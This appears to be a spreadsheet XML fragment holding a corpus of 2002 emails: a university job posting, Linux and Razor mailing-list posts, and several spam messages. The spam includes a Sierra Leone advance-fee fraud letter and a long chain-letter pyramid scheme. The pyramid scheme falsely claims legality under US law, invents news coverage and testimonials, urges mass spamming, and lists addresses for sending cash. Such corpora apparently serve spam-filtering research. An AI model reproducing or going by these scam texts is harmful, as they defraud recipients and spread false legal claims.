 Engineering at UC Santa Cruz -- please foward to anyone who you think might
 be interested.
 - Jim
 -----Original Message-----
 From: Michael Perrone [mailto:mperrone@cs.ucsc.edu]
 Sent: Thursday, September 05, 2002 12:31 PM
 To: techstaff@cse.ucsc.edu
 Subject: Recruiting for PAIII-IV Supervisor
 Dear SoE Community,
 Forgive the spam, but I wanted to make sure that everyone is aware that
 we are recruiting to replace the position vacated by Gary Moro.
 This is a technical position with supervisor responsibilities. The focus is
 on Solaris and Linux systems administration with Veritas and Irix experience
 a plus.
 The posting is here:
 http://www2.ucsc.edu/staff_hr/employment/listings/020809.htm
 Regards,
 Michael Perrone
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] WE NEED YOUR ASSISTANCE TO INVEST IN YOUR COUNTRY
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,
 I am well confident of your capability to assist me in
 a transaction for mutual benefit of both parties, ie
 (me and you) I am also believing that you will not
 expose or betray the trust and confidence I am about
 to establish with you. I have decided to contact you
 with greatest delight and personal respect.
 Well, I am  VICTOR SANKOH, Son to Mr.FODAY
 SANKOH
 who was arrested by the ECOMOG PEACE KEEPING FORCE
 months ago in my country Sierra Leone.
 Few days before the arrest of my father, he confided
 in me and ordered me to go to his underground safe and
 move out immediately, with a Deposit Agreement and
 Cash Receipt he made with a security Company in
 Abidjan Cote d'Ivoire where he deposited One Iron Box
 containing USD$ 22 million dollars cash (Twenty Two
 Million dollars).
 This money was made from the sell of Gold and Diamond
 by my FATHER and he have already
 decided to use this money for future investment of
 the family before his arrest.
 Thereafter, I rushed down to Abidjan with these
 documents and confirmed the deposit of the box by my
 father. Also, I have been granted political stay as a
 Refugee by the Government of Cte d'Ivoire.
 Meanwhile, my father have instructed me to look for a
 trusted foreigner who can assist me to move out this
 money from Cte d'Ivoire immediately for investment .
 Based on this , I solicit for your assistance to
 transfer this fund into your Account, but I will
 demand for the following requirement:
 (1) Could you provide for me a safe Bank Account where
 this fund will be transferred to in your country or
 another neaarby country where taxation will not
 takegreat toll on the money?
 (2) Could you be able to assist me to obtain my
 travelling papers after this transfer to enable me
 come over to meet you in your country for
 theinvestment of this money?
 (3) Could you be able to introduce me to a profitable
 business venture that would not require much technical
 expertise in your country where part of this fund
 willbe invested?
 Please, all these requirements are urgently needed as
 it will enable me to establish a stronger business
 relationship with you hence I will like you to be the
 general overseer of the investment thereafter. I am a
 Christian and I will please, want you to handle this
 transaction based on the trust I have established
 on you.
 For your assistance in this transaction, I have
 decided to offer you 12% percent commission of the
 total amount at the end of this business. The security
 of this business is very important to me and as such,
 I would like you to keep this business very
 confidential. I shall be expecting your urgent reply.
 Thank you and God bless you.
 VICTOR SANKOH
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: No results from razor-check on known spam?
</t>
  </si>
  <si>
    <t xml:space="preserve">
   This is bizarre. The numbers should not just disappear.  Try 
   with the '-n' switch which prints out a '-' before legit mails.
   razor-check -n mail/caughtspam
   If that still appears broken, can you do the following statement and
   send me 'spam_fileno' and 'razor.log' 
   razor-check -n -logfile=razor.log -dl=13 mail/caughtspam &gt;spam_fileno
   -chad
 On 11/08/02 07:39 -0500, Mike Burger wrote:
 ) Since last night, I've been getting odd results...or, rather, a lack of
 ) results from razor-check.
 ) 
 ) I am using SpamAssassin, and have my .procmailrc set up to dump any tagged
 ) spam into its own folder under my ~/mail directory.
 ) 
 ) When I get any new messages in that folder, I run razor-check against 
 ) them, like so:
 ) 
 ) razor-check &lt; mail/caughtspam
 ) 
 ) Previously, if I just ran razor-check against such a batch of spam, it 
 ) would report the message numbers, in the batch, that were known spam.  I 
 ) would then delete the known spam from the batch, and then run:
 ) 
 ) razor-report &lt; mail/caughtspam 
 ) 
 ) to submit the rest, after confirming that 
 ) it was, indeed, spam. (I should tell you that since using SA 2.31, I've 
 ) had less than 1% of the messages it's tagged wind up as false positives, 
 ) but I've taken the advice of many here, and am not just automatically 
 ) reporting).
 ) 
 ) As I said, previously, razor-check would tell me which messages were known 
 ) spam.  For example, if I ran razor-check against a batch of 5 messages, 
 ) and message #2 and #4 were known spam, the end result would look like 
 ) this:
 ) 
 ) 2
 ) 4
 ) 
 ) But, starting yesterday, it stopped doing this.  Now, I've got to call 
 ) 
 ) razor-check -d &lt; mail/caughtspam
 ) 
 ) And look for the "mail id # is known spam" before I can eliminate it.
 ) 
 ) The last 4 messages I checked, I had to do the same thing.
 ) 
 ) I've changed nothing in my razor installation or configuration.
 ) 
 ) Any ideas what might have changed, here? I'm running razor-agents-2.12, 
 ) and razor-agents-sdk-2.0.3.
 ) 
 ) Thanks.
 ) 
 ) --Mike
 ) 
 ) 
 ) 
 ) -------------------------------------------------------
 ) This sf.net email is sponsored by:ThinkGeek
 ) Welcome to geek heaven.
 ) http://thinkgeek.com/sf
 ) _______________________________________________
 ) Razor-users mailing list
 ) Razor-users@lists.sourceforge.net
 ) https://lists.sourceforge.net/lists/listinfo/razor-users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</si>
  <si>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[ILUG] serial port transient failure
</t>
  </si>
  <si>
    <t xml:space="preserve">Here's a weird and wacky problem:
 I'm currently out of the country with my trusty Evo N600c laptop. When I 
 tried to use the serial port to talk to my mobile phone, Linux behaved 
 pretty much as if the port was fried. Bizarre, I thought, because I'd 
 used it successfully while in the office. The only difference was that I 
 was trying the thing in the hotel. I entertained brief notions of having 
 somehow fried the serial drivers, then rebooted the laptop to Windows 
 and tried again. Worked perfectly. Back to Linux. Still not talking. 
 Considered that it might be flaky power, so I ran the laptop on battery. 
 Nope. Tried moving the laptop to a differnet part of the room where 
 there might be less bogon flux. Still not working. Eventually I gave up 
 and used the IrDA port instead - which is usually the serial connection 
 of doom, grief, and teeth-grinding.
 This morning, in the office, the damn thing is working without a hitch.
 Anyone like to suggest what mystery technology is in use in the hotel 
 that prevents serial ports from working under Linux?
 Cheers,
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] report and revoke the same message
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 de'i Friday 09 August 2002 01:27 la Steve Price cusku di'e
 &gt; On Fri, Aug 09, 2002 at 12:43:39AM -0400, cmeclax po'u le cmevi'u ke'umri 
 wrote:
 &gt; &gt; I send mail detected by Razor as spam to the spamtrap, which again
 &gt; &gt; reports it as spam. Before I added the procmail rule to revoke (as my
 &gt; &gt; real life account) Bugtraq messages that were flagged as spam, I manually
 &gt; &gt; revoked them as the spamtrap (which keeps the last 32 messages sent to
 &gt; &gt; it). Thus the spamtrap both reported as spam and revoked the same
 &gt; &gt; message. What happens to its trust rating?
 &gt;
 &gt; Maybe I'm the only one confused but what you are saying is that you
 &gt; have a spamtrap that receives Bugtraq messages and you are auto-
 &gt; matically reporting them as SPAM only to revoke them shortly there-
 &gt; after???  Either way automatic reporting is a Bad Thing (tm) IMHO.
 &gt; You should review and then report spamtrap or otherwise.  I'm not
 &gt; sure how this would affect your rating because I don't have any docs
 &gt; nor code to look at but I sincerely hope that if that's what you
 &gt; are doing that it negatively impacts your rating at a near exponential
 &gt; rate with every report/revoke cycle.
 No, I have another account that sends anything that's already in Razor to the 
 spamtrap, unless it's a Bugtraq message, in which case I revoke it as that 
 account (not as the spamtrap). I'm talking about the situation before I 
 checked for Bugtraq in the procmailrc. The message was sent to the spamtrap 
 because it was in Razor, then I manually revoked it as the spamtrap because 
 it was erroneously reported. The spamtrap is not, and never was, subscribed 
 to Bugtraq.
 cmeclax
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 iD8DBQE9U67G3/k1hdmG9jMRAssMAJ9zlr8ULek1Dz5GopcyO0GYI9YEVACgqvj1
 ziGkuXEpY2RPRP3Q+Rs/sLc=
 =VQGl
 -----END PGP SIGNATURE-----
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your guide to a new job
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;JOB SEARCH 102&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
  p.MsoNormal
 	{mso-style-parent:"";
 	margin-bottom:.0001pt;
 	font-size:12.0pt;
 	font-family:"Times New Roman";
 	margin-left:0in; margin-right:0in; margin-top:0in}
 h2
 	{margin-bottom:.0001pt;
 	text-align:center;
 	page-break-after:avoid;
 	font-size:12.0pt;
 	font-family:Helvetica;
 	font-style:italic;
 	text-decoration:underline;
 	text-underline:single; margin-left:0in; margin-right:0in; margin-top:0in}
 p.MsoBodyText
 	{margin-bottom:.0001pt;
 	font-size:12.0pt;
 	font-family:Helvetica;
 	font-weight:bold; margin-left:0in; margin-right:0in; margin-top:0in}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/span=
 &gt;&lt;/p&gt;
 &lt;h2&gt;&lt;span style=3D"font-size: 16.0pt"&gt;JOB SEARCH 102&lt;/span&gt;&lt;/h2&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/span=
 &gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align:center"&gt;&lt;b&gt;
 &lt;span style=3D"font-family: Helvetica"&gt;We have done all the research for y=
 ou.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align:center"&gt;&lt;b&gt;
 &lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align:center"&gt;&lt;b&gt;
 &lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;Are you o=
 ut of 
 work?&amp;nbsp; Thinking about making a job change?&amp;nbsp; Having a hard time f=
 inding a good 
 job?&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/s=
 pan&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;Jobs are =
 hard to 
 find.&amp;nbsp; Learning how to find them is not.&amp;nbsp; The more you know abou=
 t how to find a 
 job, the easier the search.&lt;/span&gt;&lt;/b&gt;&lt;span style=3D"font-family: Helvetic=
 a"&gt;&amp;nbsp; &lt;b&gt;
 &lt;font color=3D"#FF0000"&gt;JOB SEARCH 102: WHAT THEY DID NOT TEACH YOU IN&lt;/fo=
 nt&gt;
 &lt;font color=3D"#FF0000"&gt;101&lt;/font&gt;&lt;/b&gt; &lt;b&gt;is your link to a new job.&amp;nbsp;=
  &lt;/b&gt;&lt;/span&gt;
 &lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/span=
 &gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align:center"&gt;
 &lt;font color=3D"#0000FF"&gt;&lt;b&gt;
 &lt;span style=3D"font-size: 18.0pt; font-family: Helvetica"&gt;There is much mo=
 re!&lt;/span&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align:center"&gt;
 &lt;span style=3D"font-size: 16.0pt; font-family: Helvetica"&gt;&amp;nbsp;&lt;/span&gt;&lt;/p=
 &gt;
 &lt;p class=3D"MsoBodyText"&gt;Find out why you are having a hard time finding a=
  job and 
 learn how to get the job you have been looking for.&amp;nbsp; This e-book will=
  give you a 
 genuine edge in today=FFFFFF92s competitive job market.&amp;nbsp; You will get=
  tons of practical 
 advice on topics such as dealing with job loss, resume writing, networking=
 techniques, interviewing and negotiating.&amp;nbsp; After you read this book, =
 you will be 
 better prepared to launch a successful job search campaign.&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/s=
 pan&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;If you we=
 re laid 
 off, pushed out of your last job on an early retirement program, or are si=
 mply 
 dissatisfied with your current job and want to make a change, you will ben=
 efit 
 from JOB SEARCH 102.&amp;nbsp; This book will truly assist you in your employm=
 ent quest.&amp;nbsp;
 &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/s=
 pan&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-family: Helvetica"&gt;We have d=
 one years 
 of research on how to find jobs and we are giving you the results of our 
 efforts.&amp;nbsp; So why wait?&amp;nbsp; Do not waste any more valuable time.&amp;nbs=
 p; Do not delay.&amp;nbsp; Get 
 going on your job search, start working and making money now.&lt;/span&gt;&lt;/b&gt;&lt;/=
 p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;span style=3D"font-family: Helvetica"&gt;&amp;nbsp;&lt;/span=
 &gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;span style=3D"font-family: Helvetica"&gt;
 &lt;a href=3D"http://www142.wiildaccess.com/"&gt;&lt;font size=3D"4"&gt;CLICK HERE&lt;/fo=
 nt&gt;&lt;/a&gt;&amp;nbsp;
 &lt;b&gt;to learn more about &lt;font color=3D"#FF0000"&gt;JOB SEARCH 102: WHAT THEY D=
 ID NOT 
 TEACH YOU IN 101.&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;if you do not wish to receive our job search mailin=
 gs, 
 please &lt;a href=3D"http://www142.wiildaccess.com/remove.htm"&gt;CLICK HERE&lt;/a&gt;=
  to unsubscribe 
 from our mailing list.&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A better investment than the stock market.
</t>
  </si>
  <si>
    <t xml:space="preserve">All our mailings are sent complying to the proposed H.R. 3113 Unsolicited
 Commercial Electronic Mail Act of 2000. Please see the bottom of this
 message for further information and removal instructions.
 PARENTS OF 15 - YEAR OLD - FIND $71,000 CASH HIDDEN IN
 HIS CLOSET!
 Does this headline look familiar? Of course it does. You most likely have
 just seen this story recently featured on a major nightly news program (USA).
 And reported elsewhere in the world (including my neck of the woods -
 New Zealand). His mother was cleaning and putting laundry away when
 she came across a large brown paper bag that was suspiciously buried
 beneath some clothes and a skateboard in the back of her 15-year-old
 sons closet. Nothing could have prepared her for the shock she got when
 she opened the bag and found it was full of cash. Five-dollar bills, twenties,
 fifties and hundreds - all neatly rubber-banded in labelled piles.
 "My first thought was that he had robbed a bank", says the 41-year-old
 woman, "There was over $71,000 dollars in that bag --that's more than my
 husband earns in a year".
 The woman immediately called her husband at the car-dealership where
 he worked to tell him what she had discovered.He came home right away
 and they drove together to the boys school and picked him up.  Little did
 they suspect that where the money came from was more shocking than
 actually finding it in the closet.
 As it turns out, the boy had been sending out, via E-mail, a type of 
 "Report" to E-mail addresses that he obtained off the Internet. Everyday
 after school for the past 2 months, he had been doing this right on his
 computer in his bedroom.
 "I just got the E-mail one day and I figured what the heck, I put my name
 on it like the instructions said and I started sending it out", says the clever
 15-year-old.
 The E-mail letter listed 5 addresses and contained instructions to send one
 $5 dollar bill to each person on the list, then delete the address at the top
 and move the others addresses Down , and finally to add your name to
 the top of the list.
 The letter goes on to state that you would receive several thousand
 dollars in five-dollar bills within 2 weeks if you sent out the letter with your
 name at the top of the 5-address list. "I get junk E-mail all the time, and
 really did not think it was going to work", the boy continues.
 Within the first few days of sending out the E-mail, the Post Office Box
 that his parents had gotten him for his video-game magazine subscriptions
 began to fill up with not magazines, but envelopes containing $5 bills.
 "About a week later I rode [my bike] down to the post office and my box
 had 1 magazine and about 300 envelops stuffed in it. There was also a
 yellow slip that said I had to go up to the [post office] counter. I thought I
 was in trouble or something (laughs)". He goes on, "I went up to the
 counter and they had a whole box of more mail for me. I had to ride back
 home and empty out my backpack because I could not carry it all".  Over
 the next few weeks, the boy continued sending out the E-mail."  The
 money just kept coming in and I just kept sorting it and stashing it in the
 closet, barely had time for my homework".He had also been riding his bike
 to several of the banks in his area and exchanging the $5 bills for twenties, 
 fifties and hundreds.
 "I didn't want the banks to get suspicious so I kept riding to different banks
 with like five thousand at a time in my backpack. I would usually tell the
 lady at the bank counter that my dad had sent me in to exchange the
 money] and he was outside waiting for me.One time the lady gave me a
 really strange look and told me that she would not be able to do it for me
 and my dad would have to come in and do it, but I just rode to the next
 bank down the street (laughs)."  Surprisingly, the boy did not have any
 reason to be afraid.The reporting news 
 team examined and investigated the so-called "chain-letter" the boy was
 sending out and found that it was not a chain-letter at all.In fact, it was
 completely legal according to US Postal and Lottery Laws, Title 18,
 Section 1302 and 1341, or Title 18, Section 3005 in the US code, also in
 the code of federal regulations, Volume 16, Sections 255 and 436, which
 state a product or service must be exchanged for money received.
 Every five-dollar bill that he received contained a little note that read,
 "Please send me report number XYX".This simple note made the letter
 legal because he was exchanging a service (A Report on how-to) for a 
 five-dollar fee.
 [This is the end of the media release. If you would like to understand how
 the system works and get your $71,000 - please continue reading. What 
 appears below is what the 15 year old was sending out on the net -
  YOU CAN USE IT TOO - just follow the simple instructions].
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 BE FINANCIALLY FREE LIKE OTHERS WITHIN A YEAR!!! Before you
 say "Bull", please read the following. This is the letter you have been
 hearing about on the news lately. Due to the popularity of this letter on the
  Internet, a national weekly news program recently devoted an entire
 show to the investigation of this program described below, to see if it really
 can make people money. The show also investigated whether or not the
 program was legal. Their findings proved once and for all that there are
 "absolutely NO Laws prohibiting the participation in the program and if
 people can follow the simple instructions, they are bound to make some
 megabucks with only $25 out of pocket cost".
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS
 PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER
 THAN EVER.
 Note* follow the directons below, I had best results the second time when
 I hired a bulk email service in addition to following the reports instructions.
 In order for all of us to be successful, many, many emails must be sent so
 that the returns are many. I have been extremely successful using the
 following company. They send out the offers, and all I do is accept money
 for reports, then I send back to the people as soon as possible.
 This is what one had to say: "Thanks to this profitable opportunity. I was 
 approached many times before but each time I passed on it. I am so glad I
 finally joined just to see what one could expect in return for the minimal
 effort and money required. To my astonishment, I received total
 $610,470.00 in 21 weeks, with money still coming in".
 Pam Hedland, Fort Lee, New Jersey.
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Here is another testimonial: "This program has been around for a long time 
 but I never believed in it. But one day when I received this again in the
 mail I decided to gamble my $25 on it. I followed the simple instructions
 and walaa ..... 3 weeks later the money started to come in. First month I
 only made $240.00 but the next 2 months after that I made a total of
 $290,000.00. So far, in the past 8 months by re-entering the program, I
 have made over $710,000.00 and I am playing it again. The key to
 success in this program is to follow the simple steps and NOT change
 anything." More testimonials later but first,
 PRINT THIS NOW FOR YOUR FUTURE REFERENCE
 ++++ Order all 5 reports shown on the list below +++
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE 
 REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
 person whose name appears ON THAT LIST next to the report. MAKE
 SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT
  CORNER in case of any mail problems.
  When you place your order, make sure you order each of the 5 reports.
 You will need all 5 reports so that you can save them on your computer.
 Within a few days you will receive, vie e-mail, each of the 5 reports from
 these 5 different individuals. Save them on your computer so they will be
 accessible for you to send to the 1,000's of people who will order them from
 you. Also make a floppy of these reports and keep it on your desk in case
 something happens to your computer.
 IMPORTANT - DO NOT alter the names of the people who are listed next
 to each report, or their sequence on the list, in any way other than what is
 instructed below in step "1 through 6" or you will loose out on majority of
 your profits. Once you understand the way this works, you will also see
 how it does not work if you change it. Remember, this method has been
 tested, and if you alter, it will NOT work!!! People have tried to put their
 friends/relatives names on all five thinking they could get all the money.
 But it does not work this way. Believe us, we all have tried to be greedy
 and then nothing happened. So Do Not try to change anything other than
 what is instructed. Because if you do, it will not work for you. Remember,
 honesty reaps the reward!!!
 1.... After you have ordered all 5 reports, take this advertisement and
 REMOVE the name &amp; address of the person in REPORT # 5. This person
 has made it through the cycle and is no doubt counting their fortune.
 2.... Move the name &amp; address in REPORT # 4 down TO REPORT #5.
 3.... Move the name &amp; address in REPORT # 3 down TO REPORT #4.
 4.... Move the name &amp; address in REPORT # 2 down TO REPORT #3.
 5.... Move the name &amp; address in REPORT # 1 down TO REPORT #2
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address ACCURATELY!
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 **** Take this entire letter, with the modified list of names, and save it on
 your computer. DO NOT MAKE ANY OTHER CHANGES. Save this on a
 disk as well just in case if you loose any data. To assist you with marketing
 your business on the internet, the 5 reports you purchase will provide you
 with invaluable marketing information which includes how to send bulk
 e-mails legally, where to find thousands of free classified ads and much
 more. There are 2 Primary methods to get this venture going:
 METHOD #1: BY SENDING BULK E-MAIL LEGALLY
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Let's say that you decide to start small, just to see how it goes, and we will
 assume You and those involved send out only 5,000e-mails each. Let's
 also assume that the mailing receive only a 0.2% response (the response
 could be much better but lets just say it is only 0.2%. Also many people
 will send out hundreds of thousands e-mails instead of only 5,000 each).
 Continuing with this example, you send out only 5,000 e-mails.
 With a 0.2% response, that is only 10 orders for report # 1. Those 10
 people responded by sending out 5,000 e-mail each for a total of 50,000.
 Out of those 50,000 e-mails only 0.2% responded with orders. That equals
 100 people responded and ordered Report # 2.
 Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails.
 The 0.2% response to that is 1000 orders for Report #3.
 Those 1000 people send out 5,000 e-mails each for a total of 5 million
 e-mails sent out. The 0.2% response to that is 10,000 orders for Report #4.
 Those 10,000 people send out 5,000 e-mails each for a total of
 50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000
 orders for Report #5. THAT'S 100,000 ORDERS TIMES
 $5 EACH=$500,000.00 (half million). Your total income in this example is:
 1..... $50 +2.....$500 + 3.....$5,000 + 4..... $50,000 + 5..... $500,000.......
 Grand Total=$555,550.00
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGURE OUT
 THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU
 CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY!
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
 ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think for a moment
 what would happen if everyone or half or even one 4th of those people
 mailed 100,000e-mails each or more? There are over 150 million people on 
 the Internet worldwide and counting. Believe me, many people will do just
 that, and more!
 METHOD #2: BY PLACING FREE ADS ON THE INTERNET
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Advertising on the net is very very inexpensive and there are hundreds of
 FREE places to advertise. Placing a lot of free ads on the Internet will
 easily get a larger response.
 We strongly suggest you start with Method #1 and add METHOD #2 as
 you go along. For every $5 you receive, all you must do is e-mail them the
 Report they ordered. That's it. Always provide same day service on all
 orders. This will guarantee that the e-mail they send out with your name
 and address on it, will be prompt because they can not advertise until they
 receive the report.
 =ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always
 send $5 cash (U.S. CURRENCY) for each Report. Checks NOT
 accepted. Make sure the cash is concealed by wrapping it in at least 2
 sheets of paper or aluminum foil. On one of those sheets of paper, Write
 the NUMBER &amp; the NAME of the Report you are ordering, YOUR E-MAIL 
 ADDRESS and your name and postal address.
 PLACE YOUR ORDER FOR THESE REPORTS NOW:
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 REPORT #1: The Insider's Guide to Advertising for Free on the Net
 Order Report #1 from:
 R. R.
 PO Box 18048
 Chicago, IL 60618
 __________________________________________________________
 REPORT #2: The Insider's Guide to Sending Bulk e-mail on the Net
 Order Report #2 from:
 GM Boland
 353 Jonestown Rd. Suite 125
 Winston Salem, NC 27104
 __________________________________________________________
 REPORT #3: Secret to Multilevel marketing on the Net
 Order Report #3 from:
 R. Chernick
 PO Box 771661
 C.S. Florida 33077
 __________________________________________________________
 REPORT #4: How to become a millionaire utilizing MLM &amp; the Net
 Order Report #4 from:
 M. Eiseman
 PO Box 451971
 Sunrise, Florida 33345-1971
 ____________________________________________________
 REPORT #5: How to send out 0ne Million emails for free
 Order Report #5 From:
 L.Samon
 PO BOX 31
 Castletown
 Isle of Man
 IM 99 5XP
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 $$$$$$$$$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 +++ If you do not receive at least 10 orders for Report #1 within 2 weeks,
 continue sending e-mails until you do. =orders, 2 to 3 weeks after that you should receive 100 orders or more for
 REPORT #2. If you did not, continue advertising or sending e-mails until
 you do.
 +++ Once you have received 100 or more orders for Report #2, YOU CAN
 RELAX, because the system is already working for you, and the cash will
 continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
 your name is moved down on the list, you are placed in front of a Different
 report. You can KEEP TRACK of your PROGRESS by watching which
 report people are ordering from you. IF YOU WANT TO GENERATE
 MORE INCOME SEND ANOTHER BATCH OF E-MAILS AND START
 THE WHOLE PROCESS AGAIN. There is NO LIMIT to the income you
 can generate from this business!!!
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS
 PROGRAM: You have just received information that can give you
 financial freedom for the rest of your life, with NO RISK and JUST A
 LITTLE BIT OF EFFORT. You can make more money in the next few
 weeks and months than you have ever imagined. Follow the program
 EXACTLY AS INSTRUCTED. Do Not change it in any way. It works
 exceedingly well as it is now.
 Remember to e-mail a copy of this exciting report after you have put your
 name and address in Report#1 and moved others to #2 thru #5 as
 instructed above. One of the people you send this to may send out
 100,000 or more e-mails and your name will be on every one of them.
 Remember though, the more you send out the more potential customers
 you will reach. So my friend, I have given you the ideas, information, 
 materials and opportunity to become financially independent. 
 IT IS UP TO YOU NOW!
 ++++++++++++++++ MORE TESTIMONIALS ++++++++++++++++
 "My name is Mitchell. My wife, Jody and I live in Chicago. I am an
 accountant with a major U.S. Corporation and I make pretty good money.
 When I received this program I grumbled to Jody about receiving 
 "junk mail". I made fun of the whole thing, spouting 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received total $ 147,200.00....all cash! I was shocked.
 I have joined Jody in her "hobby".
 Mitchell Wolf, Chicago, Illinois
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 "Not being the gambling type, it took me several weeks to make up my
 mind to participate in this plan. But conservative that I am, I decided that
 the initial investment was so little that there was just no way that I
 wouldn't get enough orders to at least get my money back". "I was
 surprised when I found my medium size post office box crammed with
 orders. I made $319,210.00 in the first 12 weeks. The nice thing about
 this deal is that it does not matter where people live. There simply isn't a
 better investment with a faster return and so big".
 Dan Sondstrom, Alberta, Canada
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 "I had received this program before. I deleted it, but later I wondered if I
 should have given it a try. Of course, I had no idea who to contact to get
 another copy, so I had to wait until I was e-mailed again by someone
 else......11 months passed then it luckily came again...... I did not delete
 this one! I made more than $490,000 on my first try and all the money
 came within 22 weeks".
 Susan De Suza, New York, N.Y
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 If you have any questions of the legality of this program, contact the Office
 of Associate Director for Marketing Practices, Federal Trade Commission,
 Bureau of Consumer Protection, Washington,D.C.
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 This email was sent to you via Saf-E Mail Systems. Your email address was
 automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver IS NOT being used for the sending of this mail. No-one
 else is receiving emails from your address. You may utilize the removal link
 below if you do not wish to receive this mailing.
 http://www.webtransit.net/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The Great Power-Shortage Myth
</t>
  </si>
  <si>
